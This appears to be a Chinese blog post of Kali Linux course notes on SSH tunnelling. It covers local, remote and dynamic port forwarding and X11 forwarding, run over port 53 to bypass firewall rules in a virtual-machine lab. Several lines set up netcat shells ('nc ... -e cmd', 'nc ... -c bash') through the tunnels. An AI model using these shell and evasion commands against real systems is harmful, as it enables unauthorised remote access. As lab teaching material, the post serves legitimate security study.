Kali Linux渗透测试 115 SSH 隧道

最新推荐文章于 2024-07-12 12:28:26 发布
最新推荐文章于 2024-07-12 12:28:26 发布
阅读量1.6k 收藏 4
点赞数
分类专栏: kali-linux 文章标签: kali-linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Kevinhanser/article/details/79838165
版权

本文记录 Kali Linux 2018.1 学习使用和渗透测试的详细过程,教程为安全牛课堂里的《Kali Linux 渗透测试》课程

Kali Linux渗透测试(苑房弘)博客记录

1. 简介

  • SSH 支持双向通信隧道

    • 将其他 TCP 端口的通信通过 SSH 链接来转发
    • 用 SSH 作为传输协议,对流量自动加解密
    • 突破防火墙访问规则的限制,可用于翻墙

  • SSH 本地端口转发

    • 使效果类似于 rinetd
    • 将一本地端口与远程服务器建立隧道

  • 建立双向安全隧道

    • 将其他 TCP 端口的通信通过 SSH 链接来转发
    • 用 SSH 作为传输协议,对流量自动加解密
    • 突破防火墙访问规则的限制,可用于翻墙

  • 本地端口转发

    • 本机侦听端口,访问转发到远程主机指定端口

  • 远程端口转发

    • 远程侦听端口,访问转发到本机主机指定端口

  • 动态隧道模式

2. SSH 本地端口转发

  • 环境要求防火墙只允许内网53端口访问外网

  • 将一本地端口与远程服务器建立隧道

    • Web 服务器在远程:ssh -fCNg -L :: user@ -p

    • Web 服务器在本地:ssh -fCNg -L :localhost: user@ -p

    • -f 后台运行进程

    • -N 不执行登录 shell(不显示登录的界面)

    • -C 进行压缩,节省带宽

    • -g 复用访问时作为网关,支持多主机访问本地侦听端口

    • 网关模式转发 RDP、NC shell

    • 端口转发基于家里起来的 SSH 隧道,隧道中断端口转发中断

    • 只能在建立隧道时创建转发,不能为已有隧道增加端口转发

  • Web 服务器在远程

    • 环境拓扑

        本地 xubuntu <--hostonly--> firewall <--bridge--> kali(SSH)
  firewall <--bridge--> win2003(http)

    • win2003

        桥接:192.168.1.124
  开启远程桌面

    • m0n0wall

      在这里插入图片描述

    • kali

      • 环境

          桥接
  ip:192.168.1.110
  vim /etc/ssh/sshd_config
  PermitRootLogin yes
  Port 53
  PasswordAuthentication yes
  systemctl  restart ssh.service

        在这里插入图片描述

      • 设置

    • 本地 xubuntu

        hostonly:1.1.1.12

  ssh -fCNg -L <listen port>:<remote ip>:<remote port> user@<ssh server> -p <ssh server port>
  # ssh	-L	webserver	kali机器
  root@kali:~# ssh -L 7001:192.168.1.13:80 root@192.168.1.14 -p 53

  # 终端窗口关闭即断开连接
  -f 后台运行进程

      在这里插入图片描述

      在这里插入图片描述

      在这里插入图片描述

      在这里插入图片描述

        # -----------------------------------------

  # 使用 53 端口 登录 rdp 3389 端口
  root@lamp:~# ssh -L 7003:192.168.1.13:3389 root@192.168.1.110 -p 53

      在这里插入图片描述

      在这里插入图片描述

        root@lamp:~# apt-get install rdesktop

  # -----------------------------------------

  • Web 服务器在代理主机本地

    • kali

        root@kali:~# systemctl restart apache2.service

    • 本地 xubuntu

        ssh -fCNg -L <listen port>:localhost:<remote port> user@<ssh server> -p <ssh port>
  root@lamp:~# ssh -L 7002:localhost:80 root@192.168.1.110 -p 53

      在这里插入图片描述

      在这里插入图片描述

      在这里插入图片描述

  • 网关模式复用

      	# 通过 本地 xubuntu 最为代理,使局域网内的主机都可以访问外网
  	-g 复用访问时作为网关,支持多主机访问本地侦听端口
  	root@lamp:~# ssh -CfNg -L 7004:192.168.1.13:3389 root@192.168.1.110 -p 53
  ![在这里插入图片描述](https://img-blog.csdnimg.cn/20190413171429870.png)

  	# 使 winxp 通过 xbuntu 作为代理 ,建立 nc shell
  	win2003:
  	C:\>nc -nvlp 3333

  	xbuntu:
  	ssh -CfNg -L 7006:192.168.1.13:3333 root@192.168.1.110 -p 53

  	winxp:
  	C:\>nc 1.1.1.12 7006 -e cmd

3. SSH 远程端口转发

  • 由于 ACL 等原因,SSH 与应用连接建立方向相反

  • 本地端口转发

    • SSH 客户端+应用客户端位于 FW 一端
    • SSH 服务器+应用服务器位于另一端

  • 远程端口转发

    • SSH 客户端、应用客户端位于 FW 两端
    • SSH 服务器、应用服务器位于 FW 两端

  • ssh -fCNg -R :: user@ -p

  • 之所以成为远程,是因为 SSH 侦听端口开在远程的 SSH Server(kali) 上

  • 侦听端口永远在客户端一方

  • 远程端口转发测试环境

    • win2003 作为远程 server

        hostonly:1.1.1.11
  开启远程桌面

    • xubuntu

        hostonly:1.1.1.12
  
  ssh -CfNg -R 7001:1.1.1.11:80 root@192.168.1.110 -p 53
  ssh -CfNg -R 7001:1.1.1.11:3389 root@192.168.1.110 -p 53
  # 侦听在 kali 上,侦听地址 127.0.0.1

      在这里插入图片描述

      在这里插入图片描述

      在这里插入图片描述

        root@kali:~# rdesktop 127.0.0.1:7002

      在这里插入图片描述

  • nc shell

    • win2003

        C:\>nc -nvlp 444

    • xubuntu

        # 在 kali 侦听 444
  ssh -CfNg -R 7003:1.1.1.11:444 root@192.168.1.110 -p 53

    • kali

        root@kali:~# nc 127.0.0.1:7003 -c bash

4. 动态端口转发

  • 本地、远程端口转发都需要固定应用服务器IP、Port

    • 应用端口繁多,诸葛转发效率低
    • 某些应用不固定端口
    • 某些网站不支持IP直接访问
    • 使用非受信网络上网时保护流量不被嗅探

  • 本地侦听 socks4/5 代理端口

    • 由 SSH server 决定如何转发
    • 作为翻墙代理使用
    • 配置客户端代理(浏览器)
    • 使用 proxychains 支持无代理客户端
    • ssh -CfNg -D 7001 root@1.1.1.1 -p 2121

  • 测试环境

    • kali

        桥接:192.168.1.14

    • xubuntu

        hostonly:1.1.1.12
  ssh -CfNg -D 7009 root@192.168.1.14 -p 53

      在这里插入图片描述

    • win2007

        hostonly:1.1.1.11
  仅主机,无法上外网

      设置代理
      在这里插入图片描述

      可以正常访问百度
      在这里插入图片描述

5. X协议转发

  • 远程登陆 Linux GUI 运行图形化界面工具

    • VNC
    • X windows

  • 防火墙限制访问时

  • 测试环境

    • kali

        桥接:192.168.1.14

    • xubuntu

        hostonly:1.1.1.12
  ssjh -X root@192.168.1.14 -p 53
  # 所有的操作都是记录在 kali 中,本地只是查看和操作

      在这里插入图片描述

      xubuntu 打开图形化界面处理文字
      在这里插入图片描述

      kali 中查看结果
      在这里插入图片描述

网络安全打工人
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Kali linux 学习笔记(六十四)隧道——SSH隧道 2020.4.9
闵行小鱼塘
04-09 911
本节学习SSH隧道
Kali Linux高级渗透测试原书第2版》网络渗透测试技术书 无线网络渗透测试详解 黑客攻击与防范实战从入门到精通书
程序员白楠楠的博客
10-08 3053
内容简介: KaliLinux面向专业的渗透测试和审计,集成了大量挑选的检测工具。本书在KaliLinux平台上从一个攻击者的角度来审视网络框架,详细介绍了攻击者“杀链”采取的具体步骤。通过阅读本书读者能学习并掌握渗透测试方法和工具。 《Kali Linux高级渗透测试原书第2版》 目录: 1章 基于目标的渗透测试 1 1.1 安全测试的概念 1 1.2 经典漏洞扫描、渗透测试和红队练习的失败 2 1.3 测试方法 2 1.4 Kali Linux介绍——历史和目的 4 1.5 安...
渗透linuxssh,渗透某网站 linux 提权+ssh后门.pdf
weixin_31109967的博客
05-12 431
渗透目标真的网址我www.pjxxxx .net服务器类型Target: /showpr.php?pid=7155Host IP: xxx.xx.xx.148Web Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13Powered-by: PHP/5.2.13DB Server: ...
本地Kali系统开启SSH服务并使用内网穿透生成公网地址实现ssh远程连接
最新发布
m0_69984273的博客
07-12 1653
本文主要介绍如何在本地Kali Linux系统启动ssh服务,并结合cpolar内网穿透软件生成公网地址,轻松实现无公网IP环境也能随时ssh远程连接Kali系统。
Kali Linux渗透测试 122 隧道工具--sshlh
kevinhanser
04-08 784
本文记录 Kali Linux 2018.1 学习使用和渗透测试的详细过程,教程为安全牛课堂里的《Kali Linux 渗透测试》课程 Kali Linux渗透测试(苑房弘)博客记录 1. 简介 端口分配器根据客户端第一个包检测协议类型 根据协议检测结果将流量转发给不同目标 支持 HTTP, HTTPS, SSH, OpenVPN, tinc, XMPP 和其他可基于正则表达式判断的任何协
网络安全: Kali Linux 进行 SSH 渗透与防御
cronaldo91的博客
03-06 2042
(3) 查看Kali Linux (2022.4)系统IP地址。(2)查看Kali Linux (2022.4)系统版本。(2)扫描⽬标主机所有开放端⼝对应的服务和软件版本。(1)扫描⽬标主机所在⽹段所有存活的主机。192.168.204.154(动态)(17)SSH安全配置(容错次数)( 14)SSH安全配置(端口)(1)SSH安全配置(端口)(5)进入MSF 控制台。(8)设置用户名与密码本。(16)验证(等待1分钟)(1)进入MSF 控制台。(5)设置用户名与密码本。(10)nmap扫描端口。
Kali Linux渗透测试 120 隧道工具--ptunnel
kevinhanser
04-08 2474
本文记录 Kali Linux 2018.1 学习使用和渗透测试的详细过程,教程为安全牛课堂里的《Kali Linux 渗透测试》课程 Kali Linux渗透测试(苑房弘)博客记录 1. 简介 ping tunnel icmp 隧道工具通过 icmp echo (ping requests)和reply(ping reply) 实现隧道 适用于防火墙只允许ping出战流量的环境 支持多并
Kali Linux渗透测试(安全牛).txt
04-17
│ 任务001:Kali Linux渗透测试介绍.mp4 │ ├─第2章 Kali安装 │ 任务002:Kali Linux安装-硬盘安装、虚拟机安装.mp4 │ 任务003:Kali Linux 安装-持久加密USB安装、熟悉环境、熟悉BASH命令.mp4 │ 任务004:...
161.网络安全渗透测试—[Cobalt strike系列]—[SSH隧道]
qwsn
04-06 1985
文章目录 一、Cobalt Strike域内渗透 1 实验环境 1.1 实验拓扑 1.2 环境搭建 2 实验:搭建SSH隧道内网渗透 2.1 SSH隧道简介 2.2 SSH隧道实验背景 2.2 实验过程 2.2.1 通过钓鱼链接获取内网2-PC机的http beacon,派生到smb beacon 2.2.2 在Team Server上搭建和双网卡web跳板机的ssh隧道:本地1080对DMZ跳板机22 2.2.3 在Team Server上开启445端口转发:本地445对本地1080,并且目的地为域控44
渗透测试 ( 2 ) --- 渗透测试系统、靶机、GoogleHacking、kali工具
墨鱼菜鸡
07-11 2358
操作系统:https://zhuanlan.zhihu.com/p/162865015 1、基于 Windows、Linux、Android 的渗透测试系统 1.1 基于 Linux 的系统 Kali:https://www.kali.org/get-kali/Parrot Security OS:Parrot Securitybackbox:ht...
渗透linuxssh,Linux系统安全之ssh后门
weixin_31559919的博客
05-12 206
1.ssh -V#查看当前的ssh版本信息#OpenSSH_5.3p1, OpenSSL 1.0.0-fips 29 Mar 20102.查找ssh的配置文件一般都在/etc/ssh中3.备份原来的文件的time将/etc/ssh下的文件的备份假设/etc/ssh/sshd_config 备份为/etc/ssh/sshd_config.old4.wget存在后门的ssh#http://core.i...
kali linux-msf-ssh爆破
10-13
使用 nmap(-A -T4参数) metasploit (直接search 查找,然后 use利用就好了)本模块将测试SSH登录,在一系列的机器和报告成功登录。如果你有一个数据库加载插件和连接到一个数据库,该模块会记录成功登录和HOSTS使您可以跟踪您的访问。
内网渗透测试:隐藏通讯隧道技术(上)
whatday的专栏
07-30 2105
什么是隧道? 在实际的网络中,通常会通过各种边界设备、软/硬件防火墙甚至入侵检测系统来检查对外连接情况,如果发现异样,就会对通信进行阻断。那么什么是隧道呢?这里的隧道,就是一种绕过端口屏蔽的通信方式。防火墙两端的数据包通过防火墙所允许的数据包类型或端口进行封装,然后穿过防火墙,与对方进行通信。当封装的数据包到达目的地时,将数据包还原,并将还原后的数据包发送到相应服务器上。 常用的隧道技术有以下三种: 网络层:IPv6 隧道、ICMP 隧道 传输层:TCP 隧道、UDP 隧道、常规端口转发
渗透测试-隧道之netsh内网穿透篇
m0_60571990的博客
12-04 718
渗透测试-隧道之netsh内网穿透篇
小白Kali渗透(一)
weixin_42077203的博客
02-22 4380
Kali渗透(一) —— 道爷低血糖 一、替换源 root@kali:~# vim /etc/apt/sources.list 注释掉原来的外网源 后面的是阿里云、清华、中科大镜像源网站 root@kali:~# apt update 问题1:签名无效 解决: root@kali:~# vim /etc/apt/apt.conf.d/70debconf ```![在这里插入图片描述](https://img-blog.csdnimg.cn/20210222205944536.png) 增...
内网渗透之linuxlinux横向移动-ssh
m0_62207170的博客
05-09 1834
内网渗透之linuxlinux横向移动-ssh
SSH隧道学习
热铁皮屋上的猫的博客
01-08 223
应用数据通过ssh,完成加密,转发,解密,通讯。 ssh连接方向和应用连接方向相同,就是本地端口转发,不同就是远程端口转发。 远程端口转发 ssh客户端向SSH服务器发连接,但是应用是服务端向客户端连接,这就是远程端口 本地端口转发 ssh客户端向ssh服务器连接,并且应用也是客户端向服务器端连接,是本地端口转发。 动态转发 ssh -D 7001 &amp;amp;amp;lt;ssh server&amp;amp;amp;gt; ...
Kali Linux渗透测试——隧道&封装
Captain_RB的博客
12-19 3439
笔记内容参考安全牛课堂苑房弘老师的Kali Linux渗透测试教程 文章目录一、重定向二、隧道&封装 一、重定向 重定向流量的IP和端口,不提供加密处理 二、隧道&封装 使用多种加密技术建立通信隧道,在网络节点之间建立安全管道,在不受信任的网络环境中实现安全通信。 分为两类隧道: 点到点(IP2IP): 建立在网络层,用于局域网之间的隧道通信,数据经过网络边界后变为明文传输 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值